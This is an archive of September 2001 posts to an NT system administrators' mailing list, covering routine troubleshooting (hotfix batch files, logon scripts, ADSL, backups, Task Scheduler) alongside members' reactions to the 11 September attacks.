Dagmar Neumann
IT Operations
Manager
phone:   (02) 9690 7578
mobile: 0402 223
011
e-mail:  [EMAIL PROTECTED]

 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: WTC attack

[Clark, Steve]

Yea - I saw this yesterday after seeing the info on him in the news.
Interesting, they had posted the info and his obit was located directly
adjacent to a free trip to somewhere - big icon of a plane. Now it's
changed.

Somebody finally realized it was tacky.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Rick Iiams [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 12, 2001 7:28 PM
To: NT System Admin Issues
Subject: Re: WTC attack


apparently SlashDot is accurate

http://www.akamai.com/


At 12:06 PM 9/11/01 -0700, you wrote:
>I'm watching MSNBC and the live shots still show a lot of smoke coming up
>from the area.  Looks like a very large fire there now.   Can any of you
>NYC people see it? There were also shots of the Brooklyn bridge (I
>think - never been there) full of people walking out of the city.One of
>my buddies in NJ said he could see an aircraft carrier in the river and jet
>fighters flying over his house.
>
>Slashdot reports that one of the founders of Akamai may have been on one of
>the planes that hit the wtc.
>
>Later - DR
>
>
>http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


-Rick Iiams-
Office Systems Administrator
Midway Games West

"The difference between genius and stupidity is that genius has its limits."
- Albert Einstein


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Backup

[Clark, Steve]

Better than ArcServe - 

Floppies.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 12, 2001 2:10 PM
To: NT System Admin Issues
Subject: Re: Backup

Is there anything better than ArcServ???






Bigll <[EMAIL PROTECTED]> on 09/12/2001 01:12:14 PM

Please respond to NT System Admin Issues
  <[EMAIL PROTECTED]>

To:   NT System Admin Issues <[EMAIL PROTECTED]>
cc:

Subject:  Backup


I'm looking for backup program, which would work with CDR as a device. I
need to run daily backup for small office (100 Mg per day) 5 times a week.

Tia, Bigll


__
Do You Yahoo!?
Get email alerts & NEW webcam video instant messaging with Yahoo! Messenger
http://im.yahoo.com

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm







http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Security Fixes in Batch

[Clark, Steve]

I've had problems using long directory names like: f:\public\steve\security
fixes win2k\sp2\wks from a batch process. Try putting quotes around the long
path or create a shorter name.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 12, 2001 2:09 PM
To: NT System Admin Issues
Subject: Security Fixes in Batch

I have a question about running hotfixes in batches under win 2000. I would
appreciate any assistance you can give!

When I run the hotfixes from the command line, using the -z , -m, and -q
commands, they run unattended with no user interface.

When putting then in a batch file (see below) they seem to ignore the
parameters. Is there something that is needed in addition to what the MS KB
article indicates?

The file:

@echo off
setlocal

if /%1/==/WKS/  goto %1
if /%1/==/SVR/  goto %1
if /%1/==/ADV/  goto %1

Echo The passed Parameter must be WKS, SVR, or ADV.
echo Try Again
pause
goto exit

:wks
echo Updating a WORKSTATION. If not, abort here and now.
pause
set PATHTOFIXES="f:\public\steve\security fixes win2k\sp2\wks"

rem QFECHECK.exe install and patch:
if not exist c:\winnt\system32\qfecheck.exe
"%PATHTOFIXES%\q282784_w2k_sp3_x86_en.exe -q

rem Apply the current security fixes:

rem Apply Only if no SPs are installed!
rem echo Applying:Q260219_W2K_SP1_x86_en.EXE -q -z
rem %PATHTOFIXES%\Q260219_W2K_SP1_x86_en.EXE -q -z
rem pause

echo Applying:Q252795_W2K_SP3_x86_en.EXE  -q -m -z asks for input when
completed!
%PATHTOFIXES%\Q252795_W2K_SP3_x86_en.EXE  -q -m -z pause

echo Applying:Q298012_W2K_SP3_x86_en.EXE -m -q -z  asks for OK to reboot
%PATHTOFIXES%\Q298012_W2K_SP3_x86_en.EXE -m -q -z
pause
@echo on
setlocal

if /%1/==/WKS/  goto %1
if /%1/==/SVR/  goto %1
if /%1/==/ADV/  goto %1

Echo The passed Parameter must be WKS, SVR, or ADV.
echo Try Again
pause
goto exit

:wks
echo Updating a WORKSTATION. If not, abort here and now.
pause
set PATHTOFIXES="f:\public\steve\security fixes win2k\sp2\wks"

rem QFECHECK.exe install and patch:
if not exist c:\winnt\system32\qfecheck.exe
"%PATHTOFIXES%\q282784_w2k_sp3_x86_en.exe -q

rem Apply the current security fixes:

rem Apply Only if no SPs are installed!
rem echo Applying:Q260219_W2K_SP1_x86_en.EXE -q -z
rem %PATHTOFIXES%\Q260219_W2K_SP1_x86_en.EXE -q -z
rem pause

echo Applying:Q252795_W2K_SP3_x86_en.EXE  -q -m -z asks for input when
completed!
%PATHTOFIXES%\Q252795_W2K_SP3_x86_en.EXE  -q -m -z pause

echo Applying:Q298012_W2K_SP3_x86_en.EXE -m -q -z  asks for OK to reboot
%PATHTOFIXES%\Q298012_W2K_SP3_x86_en.EXE -m -q -z
pause

echo Applying:Q302755_W2k_SP3_x86_en.exe -q -z
%PATHTOFIXES%\Q302755_W2k_SP3_x86_en.exe -q -z
pause

echo Applying:Q300972_W2K_SP3_x86_en.EXE -q -z
%PATHTOFIXES%\Q300972_W2K_SP3_x86_en.EXE -q -z
pause

echo Applying:Q299553_W2K_SP3_x86_en.EXE -q -z
%PATHTOFIXES%\Q299553_W2K_SP3_x86_en.EXE -q -z
pause

echo Applying:Q296185_W2K_SP3_x86_en.EXE -q -z
%PATHTOFIXES%\Q296185_W2K_SP3_x86_en.EXE -q -z
pause

echo Applying:rbupdate.exe -q
%PATHTOFIXES%\rbupdate.exe -q
pause

echo Applying:Q285156_W2K_SP3_x86_en.EXE -q -z
%PATHTOFIXES%\Q285156_W2K_SP3_x86_en.EXE -q -z
pause

echo Applying:Q285851_W2K_SP3_x86_en.EXE -q -z
%PATHTOFIXES%\Q285851_W2K_SP3_x86_en.EXE -q -z
pause

echo Applying:Q276471_W2K_SP3_x86_en.EXE -q -z
%PATHTOFIXES%\Q276471_W2K_SP3_x86_en.EXE -q -z
echo All applied.
pause
rem All applied, now do the single reboot:
rem %PATHTOFIXES%\qchain.exe

:SVR


Steve Kelsay
Network Administration Group
South Carolina Department of Revenue
301 Gervais Street
Columbia, SC 29201

(803) 898-5522


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: ADSL query

[Clark, Steve]

Seems a shame as Covad seems to be the problem in most of the issues I've
had - not the ISP.

Thanks for the post.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 12, 2001 1:23 PM
To: NT System Admin Issues
Subject: RE: ADSL query

I've used just about evey type of WAN connection option, from DSL to OC-12.
There is no single company that you can get to support the entire stretch
of cable, nomatter what you get.  AT+T will shell service out to Verizon,
or Qwest will have their service vended.  That's how the world of External
interface works.  The finger pointing begins as soon as the ticket is
logged.






"Clark, Steve" <[EMAIL PROTECTED]> on 09/12/2001 11:36:30 AM

Please respond to NT System Admin Issues
  <[EMAIL PROTECTED]>

To:   NT System Admin Issues <[EMAIL PROTECTED]>
cc:

Subject:  RE: ADSL query


What a timely conversation. I have IDSL from Wcom/ UUNet and found that
they
were in no rush to help either. It's not a problem with the ISP - it is in
the relationship with the company bringing the line into the facility and
the phone companies. It's miserable when it's down as each of the companies
point the finger at each other and then jointly point at you - it's the IW
it's the CPE.

Total BS.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
 301-610-9584 voice
 240-465-0323 Efax

-Original Message-
From: Erik Brown [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 12, 2001 11:30 AM
To: NT System Admin Issues
Subject: RE: ADSL query

We are using ADSL in some of our stores here. They all have public IP's.
The
one thing that you might want to consider, and it may be different with
worldcomm, is that most providers (especially ours) are still treating ADSL
like home connectivity and therefore are in no rush to fix problems.

Erik

-Original Message-
From: Brian Judge [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 12, 2001 9:44 AM
To: NT System Admin Issues
Subject: ADSL query


ADSL has just been introduced in Ireland. I was in the process of
installing
a leased line Internet connection with Worldcom, and discovered that ADSL
would be about 30% of the price. My one worry is IP address allocation.
Does
anyone know if ADSL supports public Ips? IE, will my exchange server work?
Will my users be able to connect in via a VPN etc.?

Thanks,
Brian Judge.



The information in this e-mail (which includes any files transmitted with
it) is confidential and may also be legally privileged. It is intended for
the addressee only. Access to this email by anyone else is unauthorised. It
is not to be relied upon by any other person other than the addressee
except
with our prior approval. If no such approval is given, we will not accept
liability (in negligence or otherwise) rising from any third party acting,
or refraining from acting, on such information. Unauthorised recipients are
required to maintain confidentiality.
If you have received this e-mail in error please notify us immediately,
destroy any copies and delete it from your computer system. Any use,
dissemination, forwarding, printing or copying of the email is prohibited.
Copyright in this e-mail and any document created by us will be and remain
vested in us and will not be transferred to you. We assert the right to be
identified as the author of and to object to any misuses of the contents of
this email or such documents.
Grant Thornton is authorised by the Institute of Chartered Accountants in
Ireland to carry on investment business. A list of partners may be
inspected
at Grant Thornton, Ashford House, Tara Street, Dublin 2, Ireland

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm







http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Script not running at login on win 98 clients

[Clark, Steve]

Title: Message









But if you
run, as the user, from the 98 wkst \\server\login\script
it runs fine?

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Zangara, Jim
[mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 12,
2001 12:34 PM
To: NT System Admin Issues
Subject: RE: Script not running at
login on win 98 clients

 

none at all

 

 

Jim
Zangara, MCSE+I 
Special Projects Engineer 
Premiere Radio Networks 
A Division of Clear Channel Communications

15260 Ventura Blvd Suite 500 
Sherman Oaks, CA 91403 
Direct: (818) 461-8620 
mailto:[EMAIL PROTECTED]


 

One night I walked home very late and fell asleep in somebody's
satellite dish. My dreams were showing up on TV's all over the world. -- Steven
Wright 

-Original Message-
From: Peter Pearson
[mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, September 12,
2001 9:31 AM
To: NT System Admin Issues
Subject: Re: Script not running at
login on win 98 clients

any errors in the Event Viewer?



-
Original Message - 



From: Zangara,
Jim 



To: NT System Admin Issues 

Sent: Wednesday, September 12,
2001 12:18 PM

Subject: RE:
Script not running at login on win 98 clients

 

script was working great until the hot fix - no replication -
since it is only two servers I copied it manually to the appropriate
directories.

 

 

Jim Zangara, MCSE+I 
Special Projects Engineer 
Premiere Radio Networks 
A Division of Clear Channel Communications

15260 Ventura Blvd Suite 500 
Sherman Oaks, CA 91403 
Direct: (818) 461-8620 
mailto:[EMAIL PROTECTED]


 

Today I dialed a wrong number...The other person said,
"Hello?" and I said, "Hello, could I speak to Joey?"...They
said, "Uh...I don't think so...he's only 2 months old." I said,
"I'll wait." -- Steven Wright 





-Original
Message-
From: Peter Pearson
[mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, September 12,
2001 9:18 AM
To: NT System Admin Issues
Subject: Re: Script not running at
login on win 98 clients

Has the
script ever run successfully?

Is the
replication set up to replicate the script between PDC and BDC?

If so,
have you set/changed the logon script location on the export server?

 

Peter





-
Original Message - 



From: Zangara,
Jim 



To: NT System Admin Issues 

Sent: Wednesday, September
12, 2001 12:10 PM

Subject: Script
not running at login on win 98 clients

 

 

Hello - 

NT 4 SP6a
Domain - Win 98 clients One PDC and one BDC both Win NT 4 SP6a 

Getting a
strange problem here -


Win 98
clients are authenticating to the domain because Outlook/Exchange is working
fine but some of them do not get the login script to run.  No Errors - it
just doesn't go.  If I go to the client and drill down through network
neighborhood to the netlogin share of the PDC I get an access denied
message.  If I drill down to the netlogin share of the BDC I can run the
script manually.

If I reboot
the PDC and do the same thing from the same client I can run it manually. 

I modified
the two scripts and put the words PDC and BDC in each of the respective scripts
to see where they are running from - from my test machine I have no issues but
sometimes it runs from the BDC and sometimes from the PDC.

Verified the
netlogin share is set to everyone.  This all started after applying the MS
Security Rollup Hot fix. 

Has anyone
else seen this problem?  Searched MS and could only find the problem
relating to win95 clients Q142672 that talks about command line parameters -
that does not seem related.

 

TIA 

Jim 



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: ADSL query

[Clark, Steve]

What a timely conversation. I have IDSL from Wcom/ UUNet and found that they
were in no rush to help either. It's not a problem with the ISP - it is in
the relationship with the company bringing the line into the facility and
the phone companies. It's miserable when it's down as each of the companies
point the finger at each other and then jointly point at you - it's the IW
it's the CPE.

Total BS.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Erik Brown [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 12, 2001 11:30 AM
To: NT System Admin Issues
Subject: RE: ADSL query

We are using ADSL in some of our stores here. They all have public IP's. The
one thing that you might want to consider, and it may be different with
worldcomm, is that most providers (especially ours) are still treating ADSL
like home connectivity and therefore are in no rush to fix problems.

Erik

-Original Message-
From: Brian Judge [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 12, 2001 9:44 AM
To: NT System Admin Issues
Subject: ADSL query


ADSL has just been introduced in Ireland. I was in the process of installing
a leased line Internet connection with Worldcom, and discovered that ADSL
would be about 30% of the price. My one worry is IP address allocation. Does
anyone know if ADSL supports public Ips? IE, will my exchange server work?
Will my users be able to connect in via a VPN etc.?

Thanks,
Brian Judge.



The information in this e-mail (which includes any files transmitted with
it) is confidential and may also be legally privileged. It is intended for
the addressee only. Access to this email by anyone else is unauthorised. It
is not to be relied upon by any other person other than the addressee except
with our prior approval. If no such approval is given, we will not accept
liability (in negligence or otherwise) rising from any third party acting,
or refraining from acting, on such information. Unauthorised recipients are
required to maintain confidentiality.
If you have received this e-mail in error please notify us immediately,
destroy any copies and delete it from your computer system. Any use,
dissemination, forwarding, printing or copying of the email is prohibited.
Copyright in this e-mail and any document created by us will be and remain
vested in us and will not be transferred to you. We assert the right to be
identified as the author of and to object to any misuses of the contents of
this email or such documents.
Grant Thornton is authorised by the Institute of Chartered Accountants in
Ireland to carry on investment business. A list of partners may be inspected
at Grant Thornton, Ashford House, Tara Street, Dublin 2, Ireland

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: NewYork Terrorist Attack

[Clark, Steve]

Title: RE: NewYork Terrorist Attack









At least
with Pearl Harbor, you knew who it was. Terrorists are cowards.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Allen Crawford
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001
11:50 AM
To: NT System Admin Issues
Subject: RE: NewYork Terrorist
Attack

 

Pearl Harbor is more like it... 

 -Original Message- 
From:   Richard McClary [mailto:[EMAIL PROTECTED]] 
Sent:   Tuesday, September 11, 2001 10:28 AM 
To: NT System Admin Issues 
Subject:    RE: NewYork
Terrorist Attack 

No, I can't think of anything that touches
this event for US!  This is in 
the order of Tokyo, Hiroshima, Nagasaki, Dresden... 

At 11:19 AM 9/11/2001 -0400, you wrote: 
>This is an incredibly tragic day. 
> 
>Probably the most tragic for the US since the assassination of
JFK 

 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Win 2000 Task Scheduler - Error Code explanation

[Clark, Steve]

Try running the batch from the scheduler and watch what it does. You'll find
either it's a rights or a default directory issue.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Mohamed A. Karimullah [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 10, 2001 12:12 PM
To: NT System Admin Issues
Subject: Win 2000 Task Scheduler - Error Code explanation

A batch program when run manually or scheduled to run in a minute or two
(for testing) runs successfully. When scheduled for after hours with no
activity for about 6 hours or so, the Task Scheduler log file reports
..."The task completed with an exit code of (1)".

An exit code of (0) refers to a successful task. What does exit code (1)
signify? As I'm at it what does exit code (2331) imply? Where among the
plethora of literature did MS put an explanation of these exit codes?

The Task Scheduler runs on a Win 2000 Adv server in an NT 4 Domain. The
Batch job is a simple copy and unzipping operation.

Thanks.

Mohamed A Karimullah
Network Engineer
PATRINA CORPORATION
2 Wall Street, New York, NY 10005
T -(212) 233-1155
F -(212) 233-2244
[EMAIL PROTECTED]
www.patrina.com


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: RE: Legal Email Issues - Dont shoot me :) -

[Clark, Steve]

Salami mail - is that a type of spam mail?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Thomas W. Shinder [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 05, 2001 12:36 PM
To: NT System Admin Issues
Subject: RE: RE: Legal Email Issues - Dont shoot me :) -

Hi Benjamin,

The phonied up email is worthless as evidence unless the mail headers
can be presented as evidence. The header information would then need to
be confirmed with the ISP logs. Of course, if it goes to jury rather
than judge, she could present a salami with a message on it and claim
you sent it as email.

HTH,
Tom
www.isaserver.org/shinder



Thomas W Shinder, M.D., MCSE, MCT



-Original Message-
From: Jeff Pace [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 05, 2001 11:25 AM
To: NT System Admin Issues
Subject: OT: RE: Legal Email Issues - Dont shoot me :) -


aint divorce a b*tch? lol..been there done that, got the t-shirt.
crying in front of the judge ALWAYS works! Your only defenseFACTS!
Getting caught telling lies in court is the worst.  If you can prove she
is
not being truthful, negotiations will be yours!
Spite is a nasty beast.

email off line for any other related horror stories...heh
best of luck to you.
Jeff

-Original Message-
From: Benjamin Zachary [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 05, 2001 9:05 AM
To: NT System Admin Issues
Subject: OT: Legal Email Issues - Dont shoot me :) -



This is kind of a personal issue, but maybe someone could help me out as
it relates to legalaties for email. My x-wife typed stuff up in word to
look like an email and put threats and various obscenties in it. There
is no header info just says subject,to,from and the offending text it
could simply be typed in word (and was btw!:) ).

Anyhow, I went online to mail.com, yahoo.com, hotmail.com, outlook,
outlook express, and aol.com and printed up an email from each to show
that this isnt what an email looks like. I also printed the header info
from both outlook and outlook express to show server transactions. My
lawyer is bringing in 'an email expert' to certify the email doesnt show
anything. Any ideas.. would be grateful

Although this is pertaining to my personal problem, it may be
interesting to know what the law is viewing as a valid email vs.
fraudlent email. I read up on some cases online but most dealt with
spammers and not holding an email for an assault or contract negotation.

Thx to any who have some ideas!





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm